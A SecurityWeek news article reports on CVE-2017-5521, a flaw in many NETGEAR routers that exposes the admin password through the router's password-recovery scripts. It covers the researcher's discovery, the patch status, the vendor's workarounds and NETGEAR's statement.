Connect with us

Hi, what are you looking for?

SecurityWeekSecurityWeek

Network Security

Many NETGEAR Routers Leak Admin Passwords

NETGEAR has released firmware updates for many of its routers after an expert discovered that they are affected by serious vulnerabilities that can be exploited to obtain the administrator password for the user interface.

NETGEAR has released firmware updates for many of its routers after an expert discovered that they are affected by serious vulnerabilities that can be exploited to obtain the administrator password for the user interface.

Trustwave researcher Simon Kenin started analyzing NETGEAR routers nearly one year ago, when he was too lazy to get out of bed to perform a cold reboot of his router, and instead attempted to reboot it from its web interface. Since he had forgotten the password, he started looking for ways to remotely hack the device.

The researcher discovered a couple of exploits from 2014 that could be used to obtain a NETGEAR router’s login password via the unauth.cgi and passwordrecovered.cgi script files. Experts had previously demonstrated that a numeric password recovery token provided by unauth.cgi can be used in a request to passwordrecovered.cgi to obtain the device’s username and password in clear text.

Passwordrecovered.cgi is related to a password recovery feature present in NETGEAR routers. If the password recovery feature is disabled, which is the default setting, the current password can be obtained by sending a request to passwordrecovered.cgi with the correct recovery token.

Kenin noticed that the old exploits still worked, but he also discovered a new variant of this authentication bypass flaw. He determined that the token is not checked properly on the very first request after a reboot of the device, allowing an attacker to obtain the password by passing any data to passwordrecovered.cgi, not necessarily a correct token.

The vulnerabilities, tracked as CVE-2017-5521, can be exploited by an attacker with access to the local network or from the Internet if the remote administration feature, which is disabled by default, is enabled on the device.

NETGEAR was informed about the vulnerabilities in April 2016. The vendor released an initial advisory in June, but only workarounds were made available at the time.

The latest version of the advisory shows that NETGEAR has released security updates for 20 affected routers, but there are still a dozen models and firmware versions that remain unpatched. For devices that don’t have a firmware fix available, the manufacturer recommends manually enabling the password recovery feature – the exploits do not work if this feature is enabled – and disabling remote management.

Advertisement. Scroll to continue reading.

Trustwave has identified more than 10,000 vulnerable devices that are remotely accessible. However, considering that NETGEAR is one of the top router manufacturers and has a significant market share, experts believe hundreds of thousands and possibly even more than one million routers could be affected.

“As many people reuse their password, having the admin password of the router gives us an initial foothold on the network. We can see all the devices connected to the network and try to access them with that same admin password,” Kenin said in a blog post. “With malware such as the Mirai botnet being out there, it is also possible that some of the vulnerable routers could be infected and ultimately used as bots as well.”

NETGEAR recently announced the launch of a bug bounty program, with rewards of up to $15,000 per vulnerability. The decision to launch the program came after several researchers complained about how the company handled vulnerability disclosures.

UPDATE. NETGEAR has provided SecurityWeek the following statement:

NETGEAR is aware of the vulnerability (CVE-2017-5521), that has been recently publicized by TrustWave. This is not a new or recent development. We have been working with the security analysts to evaluate the vulnerability. NETGEAR has published a knowledge base article from our support page, which lists the affected routers and the available firmware fix.


Firmware fixes are currently available for the majority of the affected devices. To download the firmware release that fixes the password recovery vulnerability, click the link for the model and visit the firmware release page for further instructions. For devices that are still pending final firmware updates, please follow the advised work around.


Please note that this vulnerability occurs when an attacker can gain access to the internal network or when remote management is enabled on the router. Remote management is turned off by default; although remote management can turned on through the advanced settings. 


NETGEAR does appreciate and value having security concerns brought to our attention. We constantly monitors for both known and unknown threats. Being pro-active rather than re-active to emerging security issues is fundamental for product support at NETGEAR.


It is NETGEAR’s mission to be the innovative leader in connecting the world to the internet. To achieve this mission, we strive to earn and maintain the trust of those that use NETGEAR products for their connectivity.

Related: Netgear Starts Patching Critical Router Flaw

Related: Serious Flaws Found in Netgear, NUUO Network Video Recorders

Related: Remotely Exploitable 0-Day Impacts NETGEAR WNR2000 Routers

Written By

Eduard Kovacs (@EduardKovacs) is a managing editor at SecurityWeek. He worked as a high school IT teacher for two years before starting a career in journalism as Softpedia’s security news reporter. Eduard holds a bachelor’s degree in industrial informatics and a master’s degree in computer techniques applied in electrical engineering.

Click to comment

Trending

Daily Briefing Newsletter

Subscribe to the SecurityWeek Email Briefing to stay informed on the latest threats, trends, and technology, along with insightful columns from industry experts.

Understand how to go beyond effectively communicating new security strategies and recommendations.

Register

Join us for an in depth exploration of the critical nature of software and vendor supply chain security issues with a focus on understanding how attacks against identity infrastructure come with major cascading effects.

Register

Expert Insights

Related Content

Vulnerabilities

Less than a week after announcing that it would suspended service indefinitely due to a conflict with an (at the time) unnamed security researcher...

Identity & Access

Zero trust is not a replacement for identity and access management (IAM), but is the extension of IAM principles from people to everyone and...

Data Breaches

OpenAI has confirmed a ChatGPT data breach on the same day a security firm reported seeing the use of a component affected by an...

IoT Security

A group of seven security researchers have discovered numerous vulnerabilities in vehicles from 16 car makers, including bugs that allowed them to control car...

Vulnerabilities

A researcher at IOActive discovered that home security systems from SimpliSafe are plagued by a vulnerability that allows tech savvy burglars to remotely disable...

Risk Management

The supply chain threat is directly linked to attack surface management, but the supply chain must be known and understood before it can be...

Cybercrime

Patch Tuesday: Microsoft calls attention to a series of zero-day remote code execution attacks hitting its Office productivity suite.

Vulnerabilities

Patch Tuesday: Microsoft warns vulnerability (CVE-2023-23397) could lead to exploitation before an email is viewed in the Preview Pane.